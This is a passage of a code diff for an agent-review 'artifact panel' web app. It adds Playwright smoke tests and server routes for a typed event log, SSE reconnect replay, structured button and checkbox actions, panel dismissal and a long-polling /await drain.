+- Bridge: `base-bridge.js` — `sendInput 551-564`, `msSinceLastOutput 573-577`, `lastOutputAt 326,389`.
+- CSS: `components/artifact-panel.css` — base `5-25`, maximized split `216-271`.
+- Tests: `test/control/artifact-routes.test.js` `129-466`; e2e `55-artifact-panel-chrome.spec.js:82`.

--- a/e2e/tests/56-artifact-panel-v2.spec.js
+++ b/e2e/tests/56-artifact-panel-v2.spec.js
@@ -1,0 +1,176 @@
+const { test, expect } = require('@playwright/test');
+const fs = require('fs');
+const path = require('path');
+const { createServer, createSessionViaApi } = require('../helpers/server-factory');
+const { waitForAppReady, setupPageCapture, attachFailureArtifacts } = require('../helpers/terminal-helpers');
+
+// Real-browser smoke for artifact panel v2 (feat/artifact-panel-v2). Each test
+// gets its OWN server (isolated session store) so there is exactly ONE session —
+// the app auto-joins it and the panel does not re-hide (the multi-session join
+// race that broke a shared-server 2nd test). Mirrors 55-artifact-panel-chrome's
+// single-session pattern.
+//
+// Browser-drivable here: the composer human→agent comment, the typed /await drain,
+// SSE-only single reply render, dismiss/re-open + /history, and the data-aod-*
+// interactive controls (choose-one + multi-select) with cursor single-delivery.
+// NOT browser-drivable (covered by passing unit tests instead, see the report):
+//   - idle-gate decline with a mocked detectAwaiting → ExitPlanMode pending
+//     (test/control/artifact-routes.test.js "artifact push idle gate")
+//   - artifact_update INVALID_REQUEST tagged-400
+//     (test/control/artifact-routes.test.js "v2 P1 ... update ... INVALID_REQUEST")
+//   - SSE Last-Event-ID reconnect replay of exactly the gap
+//     (test/control/artifact-routes.test.js "SSE frames carry event ids ...")
+
+let artifactDir;
+let staticFile;
+let interactiveFile;
+
+test.beforeAll(() => {
+  artifactDir = fs.mkdtempSync(path.join(process.cwd(), '.tmp-e2e-artifact-v2-'));
+  staticFile = path.join(artifactDir, 'plan.html');
+  fs.writeFileSync(
+    staticFile,
+    '<!doctype html><html><head><title>Plan v2</title></head><body>' +
+    '<h1 data-source-line="1">Plan</h1><p data-source-line="3">Review me.</p></body></html>'
+  );
+  interactiveFile = path.join(artifactDir, 'interactive.html');
+  fs.writeFileSync(
+    interactiveFile,
+    '<!doctype html><html><head><title>Interactive</title></head><body>' +
+    '<button id="approveBtn" data-aod-action="choose" data-aod-value="approve" data-aod-id="plan-step-3">Approve step 3</button>' +
+    '<input id="chk7" type="checkbox" data-aod-action="check" data-aod-group="tasks" data-aod-id="task-7" data-aod-value="retry">' +
+    '<input id="chk9" type="checkbox" data-aod-action="check" data-aod-group="tasks" data-aod-id="task-9" data-aod-value="cache">' +
+    '<button id="submitBtn" data-aod-action="submit" data-aod-group="tasks" data-aod-id="tasks-go">Apply selected</button>' +
+    '</body></html>'
+  );
+});
+
+test.afterAll(() => {
+  if (artifactDir) { try { fs.rmSync(artifactDir, { recursive: true, force: true }); } catch (_) { /* ignore */ } }
+});
+
+// Per-test isolated server → exactly one session → deterministic panel mount.
+let server, port, url;
+test.beforeEach(async () => {
+  ({ server, port, url } = await createServer());
+});
+test.afterEach(async ({ page }, testInfo) => {
+  await attachFailureArtifacts(page, testInfo);
+  if (server) { try { await server.close(); } catch (_) { /* ignore */ } server = null; }
+});
+
+async function openArtifact(page, sessionId, file) {
+  await page.waitForFunction(
+    () => window.app && window.app._artifactPanel && typeof window.app.hideOverlay === 'function',
+    { timeout: 20000 }
+  );
+  await page.evaluate((sid) => {
+    window.app.hideOverlay();
+    window.app._artifactPanel.notifyActiveSessionChanged(sid);
+  }, sessionId);
+  const res = await fetch(`http://127.0.0.1:${port}/api/artifact/${encodeURIComponent(sessionId)}/open`, {
+    method: 'POST', headers: { 'Content-Type': 'application/json' },
+    body: JSON.stringify({ file: file || staticFile }),
+  });
+  expect(res.ok).toBeTruthy();
+  await expect(page.locator('#artifactPanel')).toBeVisible({ timeout: 15000 });
+}
+
+function awaitDrain(page, sessionId, cursor) {
+  return page.evaluate(async ({ p, sid, c }) => {
+    const r = await fetch(`http://127.0.0.1:${p}/api/artifact/${encodeURIComponent(sid)}/await?cursor=${c}`);
+    return r.json();
+  }, { p: port, sid: sessionId, c: cursor == null ? 0 : cursor });
+}
+
+test.describe('Artifact panel v2 smoke', () => {
+  test('HAPPY: comment -> /await -> single SSE reply -> dismiss -> re-open keeps chat/history', async ({ page }) => {
+    setupPageCapture(page);
+    const sessionId = await createSessionViaApi(port, 'v2 happy');
+    await page.goto(url);
+    await waitForAppReady(page);
+    await openArtifact(page, sessionId, staticFile);
+
+    // Human -> agent comment via the composer.
+    await page.fill('#artifactInput', 'please tighten the plan');
+    await page.click('#artifactPanel .artifact-panel__send--note');
+    await expect(page.locator('#artifactChat')).toContainText('please tighten the plan', { timeout: 10000 });
+
+    // Agent drains the TYPED /await and sees the comment event.
+    const drained = await awaitDrain(page, sessionId, 0);
+    const comment = drained.events.find((e) => e.kind === 'comment');
+    expect(comment).toBeTruthy();
+    expect(comment.prompt).toContain('please tighten the plan');
+    expect(comment.id).toBeTruthy();
+
+    // Agent -> human reply renders EXACTLY ONCE (SSE is the sole path).
+    await page.evaluate(async ({ p, sid }) => {
+      await fetch(`http://127.0.0.1:${p}/api/artifact/${encodeURIComponent(sid)}/agent-reply`, {
+        method: 'POST', headers: { 'Content-Type': 'application/json' },
+        body: JSON.stringify({ text: 'on it now' }),
+      });
+    }, { p: port, sid: sessionId });
+    await expect(page.locator('#artifactChat')).toContainText('on it now', { timeout: 10000 });
+    const replyCount = await page.evaluate(() => document.getElementById('artifactChat').textContent.split('on it now').length - 1);
+    expect(replyCount).toBe(1);
+
+    // Dismiss (×) -> hidden + re-open badge + server visibility flips.
+    await page.click('#artifactPanel .artifact-panel__btn[aria-label="Close panel"]');
+    await expect(page.locator('#artifactPanel')).toBeHidden({ timeout: 10000 });
+    await expect(page.locator('.artifact-panel__reopen')).toBeVisible({ timeout: 10000 });
+    const vis = await page.evaluate(async ({ p, sid }) => {
+      const r = await fetch(`http://127.0.0.1:${p}/api/artifact/${encodeURIComponent(sid)}/history`);
+      return (await r.json()).visibility;
+    }, { p: port, sid: sessionId });
+    expect(vis).toBe('dismissed');
+
+    // Re-open -> panel back, chat/history intact.
+    await page.click('.artifact-panel__reopen');
+    await expect(page.locator('#artifactPanel')).toBeVisible({ timeout: 10000 });
+    await expect(page.locator('.artifact-panel__reopen')).toBeHidden();
+    await expect(page.locator('#artifactChat')).toContainText('please tighten the plan');
+    await expect(page.locator('#artifactChat')).toContainText('on it now');
+  });
+
+  test('EDGE choose-one + single delivery: one data-aod choose -> ONE action, re-drain empty', async ({ page }) => {
+    setupPageCapture(page);
+    const sessionId = await createSessionViaApi(port, 'v2 choose');
+    await page.goto(url);
+    await waitForAppReady(page);
+    await openArtifact(page, sessionId, interactiveFile);
+
+    const frame = page.frameLocator('#artifactFrame');
+    await frame.locator('#approveBtn').click();
+    await expect(page.locator('#artifactChat')).toContainText('choose: plan-step-3', { timeout: 10000 });
+
+    const drained = await awaitDrain(page, sessionId, 0);
+    const actions = drained.events.filter((e) => e.kind === 'action' && e.action === 'choose');
+    expect(actions.length).toBe(1);
+    expect(actions[0].elementId).toBe('plan-step-3');
+    expect(actions[0].value).toBe('approve');
+
+    // Single delivery: draining again from the returned cursor yields nothing —
+    // the same event is never re-delivered (cursor ack).
+    const again = await awaitDrain(page, sessionId, drained.cursor);
+    expect(again.events).toEqual([]);
+  });
+
+  test('EDGE multi-select: check a group then submit -> ONE action carrying {group, selected}', async ({ page }) => {
+    setupPageCapture(page);
+    const sessionId = await createSessionViaApi(port, 'v2 multi');
+    await page.goto(url);
+    await waitForAppReady(page);
+    await openArtifact(page, sessionId, interactiveFile);
+
+    const frame = page.frameLocator('#artifactFrame');
+    await frame.locator('#chk7').check();
+    await frame.locator('#submitBtn').click();
+    await expect(page.locator('#artifactChat')).toContainText('submitted tasks', { timeout: 10000 });
+
+    const drained = await awaitDrain(page, sessionId, 0);
+    const submits = drained.events.filter((e) => e.kind === 'action' && e.action === 'submit');
+    expect(submits.length).toBe(1);
+    expect(submits[0].group).toBe('tasks');
+    expect(submits[0].selected).toEqual([{ elementId: 'task-7', value: 'retry' }]);
+  });
+});

--- a/src/artifact-review.js
+++ b/src/artifact-review.js
@@ -12,6 +12,10 @@ const DEFAULT_SSE_HEARTBEAT_MS = 15000;
 // Bound the artifact-push await so a stalled PTY write can't hold the /prompts
 // HTTP response open. On timeout we treat the push as failed and re-queue.
 const PUSH_TIMEOUT_MS = 4000;
+// Bounded per-session event replay buffer (contract §2 / C-P0-4). Backs SSE
+// Last-Event-ID reconnect replay, GET /history rehydrate, and the typed
+// GET /await drain. Old events roll off once past the cap.
+const MAX_REPLAY_EVENTS = 200;
 
 function realpathOrResolve(file) {
   let resolved = path.resolve(file);
@@ -143,6 +147,43 @@ function artifactPushEnabledFromEnv(raw) {
   return !/^(0|false|off|no)$/i.test(String(raw == null ? '' : raw).trim());
 }
 
+// Normalize an inbound structured action (contract §2/§4) into a stored `action`
+// ArtifactEvent payload (id/at added by _appendEvent). Requires action+elementId.
+// Carries value/group/selected/selector/sourceLine when present. Returns null for
+// anything malformed so a bad item can't poison the event log.
+function normalizeActionPayload(a) {
+  if (!a || typeof a !== 'object') return null;
+  const action = typeof a.action === 'string' ? a.action.trim() : '';
+  const elementId = typeof a.elementId === 'string' ? a.elementId.trim() : '';
+  if (!action || !elementId) return null;
+  const payload = { kind: 'action', action, elementId };
+  if (typeof a.value === 'string') payload.value = a.value;
+  if (typeof a.group === 'string' && a.group) payload.group = a.group;
+  if (Array.isArray(a.selected)) {
+    payload.selected = a.selected
+      .map((s) => {
+        if (!s || typeof s !== 'object') return null;
+        const id = typeof s.elementId === 'string' ? s.elementId : '';
+        if (!id) return null;
+        const item = { elementId: id };
+        if (typeof s.value === 'string') item.value = s.value;
+        return item;
+      })
+      .filter(Boolean);
+  }
+  if (typeof a.selector === 'string') payload.selector = a.selector;
+  if (typeof a.sourceLine === 'number') payload.sourceLine = a.sourceLine;
+  return payload;
+}
+
+// Whether an action verb corresponds to a menu-style approval that should route
+// to the structured control-plane respond path (contract §5) rather than the
+// drain — approve / reject / choose. Multi-select (check/submit) and custom verbs
+// always drain.
+function isApprovalActionVerb(verb) {
+  return verb === 'approve' || verb === 'reject' || verb === 'choose';
+}
+
 class ArtifactReviewStore extends EventEmitter {
   constructor() {
     super();
@@ -168,6 +209,15 @@ class ArtifactReviewStore extends EventEmitter {
       layoutWarnings: [],
       domSnapshot: null,
       chat: [],
+      // Typed, monotonically-id'd event log (contract §2). Holds agent-reply /
+      // comment / ended events for SSE reconnect replay, /history rehydrate, and
+      // the /await drain. Bounded to MAX_REPLAY_EVENTS.
+      events: [],
+      _seq: 0,
+      // Panel visibility (contract §9). 'dismissed' hides the panel while the
+      // review stays alive; server-authoritative so a reconnecting panel + the
+      // artifact_dismiss tool agree.
+      visibility: 'shown',
       presence: { connected: false, lastSeen: null },
       updatedAt: nowIso(),
     };
@@ -179,12 +229,92 @@ class ArtifactReviewStore extends EventEmitter {
     if (!Array.isArray(review.queuedPrompts)) review.queuedPrompts = [];
     if (!Array.isArray(review.layoutWarnings)) review.layoutWarnings = [];
     if (!Array.isArray(review.chat)) review.chat = [];
+    if (!Array.isArray(review.events)) review.events = [];
+    if (typeof review._seq !== 'number') review._seq = 0;
+    if (review.visibility !== 'dismissed') review.visibility = 'shown';
     if (!review.presence || typeof review.presence !== 'object') {
       review.presence = { connected: false, lastSeen: null };
     }
     review.updatedAt = nowIso();
 
     this._reviews.set(aiSessionId, review);
+    return review;
+  }
+
+  // Append a typed event to the review's replay buffer, assigning the next
+  // per-session monotonic id (contract §2). Bounded: oldest events roll off past
+  // MAX_REPLAY_EVENTS. Returns the stored event (with id + at).
+  _appendEvent(review, evt) {
+    review._seq = (typeof review._seq === 'number' ? review._seq : 0) + 1;
+    const stored = Object.assign({ id: String(review._seq), at: nowIso() }, evt);
+    review.events.push(stored);
+    if (review.events.length > MAX_REPLAY_EVENTS) {
+      review.events.splice(0, review.events.length - MAX_REPLAY_EVENTS);
+    }
+    return stored;
+  }
+
+  // Derive the human-readable chat log from the typed event stream: agent-reply
+  // -> {role:'agent'}, comment -> {role:'you'}. Single source of truth so a
+  // reconnecting panel repaints exactly what happened.
+  _deriveChat(review) {
+    const out = [];
+    for (const e of review.events) {
+      if (e.kind === 'agent-reply') {
+        out.push({ id: e.id, role: 'agent', text: e.text == null ? '' : String(e.text), at: e.at });
+      } else if (e.kind === 'comment') {
+        out.push({ id: e.id, role: 'you', text: String(e.prompt || e.text || ''), at: e.at });
+      }
+    }
+    return out;
+  }
+
+  // Map a queued prompt (panel object or bare string) into a comment ArtifactEvent
+  // payload (id/at added by _appendEvent).
+  _commentPayloadFromPrompt(p) {
+    if (typeof p === 'string') return { kind: 'comment', prompt: p, text: '', selector: '' };
+    if (!p || typeof p !== 'object') return null;
+    const payload = {
+      kind: 'comment',
+      prompt: typeof p.prompt === 'string' ? p.prompt : '',
+      text: typeof p.text === 'string' ? p.text : '',
+      selector: typeof p.selector === 'string' ? p.selector : '',
+    };
+    if (typeof p.sourceLine === 'number') payload.sourceLine = p.sourceLine;
+    if (p.target && typeof p.target === 'object') payload.target = p.target;
+    return payload;
+  }
+
+  // Snapshot for GET /history (browser reconnect/rehydrate) — contract §3.3.
+  historySnapshot(aiSessionId) {
+    const review = this._reviews.get(aiSessionId);
+    if (!review) return null;
+    return {
+      chat: this._deriveChat(review),
+      events: cloneArray(review.events),
+      status: review.status,
+      cursor: String(review._seq || 0),
+      visibility: review.visibility === 'dismissed' ? 'dismissed' : 'shown',
+    };
+  }
+
+  // Typed events with id > cursor, filtered to the kinds a channel consumes.
+  eventsSince(aiSessionId, cursor, kinds) {
+    const review = this._reviews.get(aiSessionId);
+    if (!review) return [];
+    const after = Number(cursor) || 0;
+    const want = Array.isArray(kinds) ? kinds : null;
+    return review.events.filter((e) => {
+      if ((Number(e.id) || 0) <= after) return false;
+      return !want || want.includes(e.kind);
+    });
+  }
+
+  setVisibility(aiSessionId, visibility) {
+    const review = this._reviews.get(aiSessionId);
+    if (!review) return null;
+    review.visibility = visibility === 'dismissed' ? 'dismissed' : 'shown';
+    review.updatedAt = nowIso();
     return review;
   }
 
@@ -195,6 +325,12 @@ class ArtifactReviewStore extends EventEmitter {
     const queued = cloneArray(prompts);
     if (queued.length > 0) {
       review.queuedPrompts.push(...queued);
+      // Record each as a typed comment event for /history + /await (non-destructive;
+      // independent of the destructive queuedPrompts/poll path).
+      for (const p of queued) {
+        const payload = this._commentPayloadFromPrompt(p);
+        if (payload) this._appendEvent(review, payload);
+      }
     }
     if (domSnapshot !== undefined) {
       review.domSnapshot = domSnapshot;
@@ -205,6 +341,26 @@ class ArtifactReviewStore extends EventEmitter {
       this.emit('feedback', { aiSessionId, kind: 'prompts', review });
     }
     return review;
+  }
+
+  // Enqueue structured action events (contract §2/§4). Actions live ONLY in the
+  // typed event log (drain via /await + /history); they are NOT in the legacy
+  // destructive queue, so /poll never sees them (new typed lane). Returns the
+  // stored events (with ids). Emits 'feedback' so an in-flight /await resolves.
+  enqueueAction(aiSessionId, actions) {
+    const review = this._reviews.get(aiSessionId);
+    if (!review) return null;
+    const list = Array.isArray(actions) ? actions : [actions];
+    const stored = [];
+    for (const a of list) {
+      const payload = normalizeActionPayload(a);
+      if (payload) stored.push(this._appendEvent(review, payload));
+    }
+    if (stored.length > 0) {
+      review.updatedAt = nowIso();
+      this.emit('feedback', { aiSessionId, kind: 'actions', review });
+    }
+    return stored;
   }
 
   recordLayoutWarnings(aiSessionId, warnings) {
@@ -299,15 +455,15 @@ class ArtifactReviewStore extends EventEmitter {
     const review = this._reviews.get(aiSessionId);
     if (!review) return null;
 
-    const reply = {
-      role: 'agent',
+    const event = this._appendEvent(review, {
+      kind: 'agent-reply',
       text: text == null ? '' : String(text),
-      at: nowIso(),
-    };
+    });
+    const reply = { role: 'agent', text: event.text, at: event.at, id: event.id };
     review.chat.push(reply);
     review.updatedAt = nowIso();
 
-    this.emit('agent-reply', { aiSessionId, text: reply.text, reply, review });
+    this.emit('agent-reply', { aiSessionId, id: event.id, text: reply.text, reply, review });
     return reply;
   }
 
@@ -327,7 +483,8 @@ class ArtifactReviewStore extends EventEmitter {
 
     review.status = 'ended';
     review.updatedAt = nowIso();
-    this.emit('ended', { aiSessionId, review });
+    const event = this._appendEvent(review, { kind: 'ended' });
+    this.emit('ended', { aiSessionId, id: event.id, review });
     return review;
   }
 
@@ -659,6 +816,14 @@ function createArtifactReviewRouter(options) {
   const pushTimeoutMs = typeof options.pushTimeoutMs === 'number' && options.pushTimeoutMs > 0
     ? options.pushTimeoutMs
     : PUSH_TIMEOUT_MS;
+  // Optional structured-approval routing hook (contract §5 / C-P1-4). Given an
+  // approval-style action (approve/reject/choose) it attempts to deliver it via
+  // the control-plane respond path (answering a pending ExitPlanMode/AskUser/
+  // permission menu). Returns truthy when it actually responded; then the action
+  // is NOT enqueued for the drain (no double-apply). Absent → all actions drain.
+  const routeApprovalAction = typeof options.routeApprovalAction === 'function'
+    ? options.routeApprovalAction
+    : null;
 
   // Count of in-flight long-poll requests per session. Non-zero means the agent
   // is actively waiting on artifact_poll, so a queued prompt is delivered by that
@@ -900,6 +1065,88 @@ function createArtifactReviewRouter(options) {
     res.json({ ok: true, changed: !!(result && result.changed) });
   });
 
+  // Structured action feedback (human→agent) — contract §3/§4. Actions are a typed
+  // lane distinct from free-text /prompts: they are NEVER bracketed-paste-injected.
+  // Approval-style actions (approve/reject/choose) route to the control-plane
+  // respond path when a menu is pending (contract §5); everything else is enqueued
+  // as a typed `action` event for the /await drain. Returns { ok, pushed, queued }.
+  router.post('/:sessionId/actions', async (req, res) => {
+    const sessionId = req.params.sessionId;
+    if (!store.get(sessionId)) return res.status(404).json({ error: 'artifact review not found' });
+
+    const actions = req.body && req.body.actions;
+    if (!Array.isArray(actions)) return res.status(400).json({ error: 'actions must be an array' });
+
+    let routed = 0;
+    const toQueue = [];
+    for (const raw of actions) {
+      const norm = normalizeActionPayload(raw);
+      if (!norm) continue;
+      let handled = false;
+      if (routeApprovalAction && isApprovalActionVerb(norm.action)) {
+        try {
+          handled = !!(await routeApprovalAction(sessionId, norm));
+        } catch (_) {
+          handled = false;
+        }
+      }
+      if (handled) routed += 1;
+      else toQueue.push(norm); // not routed (no live menu) → deliver via the drain so
+                               // the human's intent is never lost. routed and drained
+                               // are mutually exclusive per action, so no double-apply.
+    }
+    if (toQueue.length > 0) store.enqueueAction(sessionId, toQueue);
+
+    res.json({ ok: true, pushed: routed > 0, queued: toQueue.length });
+  });
+
+  // Agent replaces the review's content (contract §1.1/§3.2). `file` (validatePath)
+  // is re-read; `html` is written to the review's EXISTING sandboxed file, then a
+  // reload is broadcast (never render an unsandboxed over-the-wire blob). Exactly
+  // one of file|html; violations return the tagged-400 INVALID_REQUEST wire signal.
+  router.post('/:sessionId/update', (req, res) => {
+    const sessionId = req.params.sessionId;
+    const review = store.get(sessionId);
+    if (!review) return res.status(404).json({ error: 'artifact review not found' });
+
+    const file = req.body && req.body.file;
+    const html = req.body && req.body.html;
+    const hasFile = typeof file === 'string' && file.length > 0;
+    const hasHtml = typeof html === 'string';
+    if (hasFile === hasHtml) {
+      return res.status(400).json({ error: { code: 'INVALID_REQUEST', message: 'exactly one of file|html is required' } });
+    }
+
+    let targetPath;
+    if (hasFile) {
+      const validation = validatePath(file);
+      if (!validation || !validation.valid) {
+        return res.status(400).json({ error: { code: 'INVALID_REQUEST', message: (validation && validation.error) || 'file escapes the sandbox' } });
+      }
+      targetPath = validation.path;
+    } else {
+      // Write html to the review's existing (already-sandboxed) file.
+      if (!review.file) {
+        return res.status(400).json({ error: { code: 'INVALID_REQUEST', message: 'html requires an existing review file' } });
+      }
+      const validation = validatePath(review.file);
+      if (!validation || !validation.valid) {
+        return res.status(400).json({ error: { code: 'INVALID_REQUEST', message: (validation && validation.error) || 'review file escapes the sandbox' } });
+      }
+      try {
+        fs.writeFileSync(validation.path, html, 'utf8');
+      } catch (err) {
+        return res.status(500).json({ error: 'write failed', message: err.message });
+      }
+      targetPath = validation.path;
+    }
+
+    review.file = targetPath;
+    startWatch(sessionId, targetPath);
+    broadcastToSession(sessionId, { type: 'artifact_review_reload', sessionId });
+    res.json({ ok: true, viewUrl: artifactPath(sessionId, '/view', req) });
+  });
+
   router.get('/:sessionId/events', (req, res) => {
     const sessionId = req.params.sessionId;
     if (!store.get(sessionId)) return res.status(404).json({ error: 'artifact review not found' });
@@ -913,9 +1160,10 @@ function createArtifactReviewRouter(options) {
     if (typeof res.flushHeaders === 'function') res.flushHeaders();
 
     let closed = false;
-    function send(event, obj) {
+    function send(event, obj, id) {
       if (closed) return;
       try {
+        if (id != null) res.write('id: ' + id + '\n');
         res.write('event: ' + event + '\n');
         res.write('data: ' + JSON.stringify(obj) + '\n\n');
       } catch (_) {
@@ -924,7 +1172,7 @@ function createArtifactReviewRouter(options) {
     }
     function onAgentReply(evt) {
       if (!evt || evt.aiSessionId !== sessionId) return;
-      send('agent-reply', { type: 'agent-reply', text: evt.text, reply: evt.reply });
+      send('agent-reply', { type: 'agent-reply', id: evt.id, text: evt.text, reply: evt.reply }, evt.id);
     }
     function onPresence(evt) {
       if (!evt || evt.aiSessionId !== sessionId) return;
@@ -932,7 +1180,7 @@ function createArtifactReviewRouter(options) {
     }
     function onEnded(evt) {
       if (!evt || evt.aiSessionId !== sessionId) return;
-      send('ended', { type: 'ended', status: 'ended' });
+      send('ended', { type: 'ended', status: 'ended', id: evt.id }, evt.id);
       cleanup();
       try { res.end(); } catch (_) { /* ignore */ }
     }
@@ -953,6 +1201,22 @@ function createArtifactReviewRouter(options) {
     }, sseHeartbeatMs);
     if (typeof heartbeat.unref === 'function') heartbeat.unref();
 
+    // Reconnect replay (C-P0-4): the browser's EventSource resends the last id it
+    // saw via Last-Event-ID; replay exactly the gap (agent-reply / ended events
+    // with a higher id) so a dropped SSE never loses a delivered reply. A fresh
+    // connection (no header) replays nothing; the panel rehydrates via /history.
+    const lastEventId = req.headers['last-event-id'];
+    if (lastEventId != null && String(lastEventId).trim() !== '') {
+      const missed = store.eventsSince(sessionId, lastEventId, ['agent-reply', 'ended']);
+      for (const e of missed) {
+        if (e.kind === 'agent-reply') {
+          send('agent-reply', { type: 'agent-reply', id: e.id, text: e.text, reply: { role: 'agent', text: e.text, at: e.at, id: e.id } }, e.id);
+        } else if (e.kind === 'ended') {
+          send('ended', { type: 'ended', status: 'ended', id: e.id }, e.id);
+        }
+      }
+    }
+
     const presence = store.setPresence(sessionId, { connected: true, lastSeen: nowIso() });
     send('presence', { type: 'presence', presence });
 
@@ -969,6 +1233,103 @@ function createArtifactReviewRouter(options) {
     if (!review) return res.status(404).json({ error: 'artifact review not found' });
     broadcastToSession(sessionId, { type: 'artifact_review_ended', sessionId });
     res.json({ ok: true, status: review.status });
+  });
+
+  // Hide/show the panel without ending the review (contract §9). Server-authoritative
+  // visibility so a reconnecting panel and the artifact_dismiss tool agree. Body
+  // { dismissed?: boolean } defaults true; the panel sends dismissed:false to
+  // re-open. The review stays alive and the feedback channel stays open.
+  router.post('/:sessionId/dismiss', (req, res) => {
+    const sessionId = req.params.sessionId;
+    if (!store.get(sessionId)) return res.status(404).json({ error: 'artifact review not found' });
+    const dismissed = !(req.body && req.body.dismissed === false);
+    store.setVisibility(sessionId, dismissed ? 'dismissed' : 'shown');
+    broadcastToSession(sessionId, { type: 'artifact_review_dismissed', sessionId, dismissed });
+    res.json({ ok: true, visibility: dismissed ? 'dismissed' : 'shown' });
+  });
+
+  // Browser-only rehydrate/replay (contract §3.3). Returns the derived chat, the
+  // typed event buffer, status, high-water cursor, and panel visibility.
+  router.get('/:sessionId/history', (req, res) => {
+    const sessionId = req.params.sessionId;
+    const snapshot = store.historySnapshot(sessionId);
+    if (!snapshot) return res.status(404).json({ error: 'artifact review not found' });
+    res.setHeader('Cache-Control', 'no-cache, no-transform');
+    res.json(snapshot);
+  });
+
+  // Typed drain (contract §1/§2). Long-polls like /poll, but returns
+  // { events: ArtifactEvent[], status, cursor } — comment + ended events with
+  // id > cursor. Single-delivery is by cursor (the agent passes the returned
+  // cursor next call), so this is non-destructive w.r.t. the legacy /poll queue.
+  // Counts as an active poll so concurrent /prompts feedback is delivered here,
+  // never injected into the PTY.
+  router.get('/:sessionId/await', (req, res) => {
+    const sessionId = req.params.sessionId;
+    const review = store.get(sessionId);
+    if (!review) return res.status(404).json({ error: 'artifact review not found' });
+
+    const cursor = req.query && req.query.cursor != null ? String(req.query.cursor) : '0';
+    const requestedHold = Number(req.query && req.query.timeoutMs);
+    const holdMs = Number.isFinite(requestedHold) && requestedHold > 0
+      ? Math.min(requestedHold, pollHoldMs)
+      : pollHoldMs;
+
+    function awaitPayload() {
+      const current = store.get(sessionId) || review;
+      const events = store.eventsSince(sessionId, cursor, ['comment', 'action', 'ended']);
+      const highWater = events.reduce((m, e) => Math.max(m, Number(e.id) || 0), Number(cursor) || 0);
+      return { events, status: current ? current.status : 'missing', cursor: String(highWater) };
+    }
+
+    const immediate = awaitPayload();
+    if (immediate.events.length > 0 || review.status === 'ended') {
+      res.setHeader('Content-Type', 'application/json; charset=utf-8');
+      res.setHeader('Cache-Control', 'no-cache, no-transform');
+      return res.end(JSON.stringify(immediate));
+    }
+
+    res.status(200);
+    res.setHeader('Content-Type', 'application/json; charset=utf-8');
+    res.setHeader('Cache-Control', 'no-cache, no-transform');
+    res.setHeader('X-Accel-Buffering', 'no');
+    if (typeof res.flushHeaders === 'function') res.flushHeaders();
+
+    let pollCounted = true;
+    pollDelta(sessionId, 1);
+    let done = false;
+    let timeout = null;
+    let heartbeat = null;
+    function cleanup() {
+      if (pollCounted) { pollCounted = false; pollDelta(sessionId, -1); }
+      if (timeout) clearTimeout(timeout);
+      if (heartbeat) clearInterval(heartbeat);
+      store.removeListener('feedback', onFeedback);
+      store.removeListener('agent-reply', onAny);
+      store.removeListener('ended', onAny);
+    }
+    function finish(payload) {
+      if (done) return;
+      done = true;
+      cleanup();
+      try { res.end(JSON.stringify(payload)); } catch (_) { /* client gone */ }
+    }
+    function tick() {
+      const payload = awaitPayload();
+      if (payload.events.length > 0) finish(payload);
+    }
+    function onFeedback(evt) { if (evt && evt.aiSessionId === sessionId) tick(); }
+    function onAny(evt) { if (evt && evt.aiSessionId === sessionId) tick(); }
+
+    req.once('close', () => { if (!done) cleanup(); });
+    timeout = setTimeout(() => finish(awaitPayload()), holdMs);
+    heartbeat = setInterval(() => { try { res.write(' '); } catch (_) { cleanup(); } }, pollHeartbeatMs);
+    if (typeof timeout.unref === 'function') timeout.unref();
+    if (typeof heartbeat.unref === 'function') heartbeat.unref();
+
+    store.on('feedback', onFeedback);
+    store.on('agent-reply', onAny);
+    store.on('ended', onAny);
   });
 
   router.get('/:sessionId/poll', (req, res) => {
@@ -1064,8 +1425,10 @@ function createArtifactReviewRouter(options) {
     const text = req.body && req.body.text;
     if (typeof text !== 'string') return res.status(400).json({ error: 'text is required' });
 
+    // Render is SSE-only (contract §5 / C-P0-1): addAgentReply emits 'agent-reply'
+    // which the /events stream delivers. We deliberately do NOT also broadcast a WS
+    // artifact_agent_reply — that second path double-rendered the chat bubble.
     const reply = store.addAgentReply(sessionId, text);
-    broadcastToSession(sessionId, { type: 'artifact_agent_reply', sessionId, text });
     res.json({ ok: true, reply });
   });
 
@@ -1081,6 +1444,8 @@ module.exports = {
   formatFeedbackForAgent,
   buildArtifactPushPayload,
   artifactPushEnabledFromEnv,
+  normalizeActionPayload,
+  isApprovalActionVerb,
   injectLavishSdk,
   isMarkdownFile,
   markdownArtifactShell,

--- a/src/artifact-sdk-client.js
+++ b/src/artifact-sdk-client.js
@@ -220,6 +220,66 @@
     return !annotationMode || isAnnotationUi(target) || isInteractiveControl(target);
   }
 
+  // ---- declarative interactive controls (data-aod-*; contract §4) ------------
+  // The producer renders buttons/plan-steps with data-aod-action / data-aod-id
+  // (+ optional data-aod-value / data-aod-group). The SDK captures activation and
+  // posts a structured 'artifact-action' to the panel — it does NOT open the
+  // annotation card. Native controls WITHOUT data-aod-action are untouched.
+
+  function aodActionEl(target) {
+    return target && target.closest ? target.closest('[data-aod-action]') : null;
+  }
+
+  // The currently-checked members of a multi-select group, as [{elementId,value?}].
+  function aodGroupChecked(group) {
+    var out = [];
+    if (!group) return out;
+    var boxes;
+    try {
+      boxes = document.querySelectorAll('[data-aod-action="check"][data-aod-group="' + cssEscape(group) + '"]');
+    } catch (_) {
+      boxes = [];
+    }
+    for (var i = 0; i < boxes.length; i++) {
+      var b = boxes[i];
+      if (!b.checked) continue;
+      var id = b.getAttribute('data-aod-id');
+      if (!id) continue;
+      var item = { elementId: id };
+      var v = b.getAttribute('data-aod-value');
+      if (v != null) item.value = v;
+      out.push(item);
+    }
+    return out;
+  }
+
+  // Emit a structured action for a data-aod element. Requires data-aod-action +
+  // data-aod-id (and data-aod-group for check/submit); missing → ignored. `check`
+  // toggles are UI-local and emit nothing (the group's submit harvests the set).
+  function emitAodAction(el) {
+    if (!el) return false;
+    var action = el.getAttribute('data-aod-action');
+    var elementId = el.getAttribute('data-aod-id');
+    if (!action || !elementId) return false;
+    if (action === 'check') return false; // UI-local only
+    var payload = { action: action, elementId: elementId };
+    var value = el.getAttribute('data-aod-value');
+    if (value != null) payload.value = value;
+    if (action === 'submit') {
+      var group = el.getAttribute('data-aod-group');
+      if (!group) return false; // submit requires a group
+      payload.group = group;
+      payload.selected = aodGroupChecked(group);
+    }
+    var ctx = { selector: selector(el), text: (el.innerText || el.textContent || '').trim().replace(/\s+/g, ' ').slice(0, 240) };
+    var line = sourceLineOf(el);
+    if (line !== undefined) ctx.sourceLine = line;
+    payload.context = ctx;
+    payload.domSnapshot = readDomSnapshot();
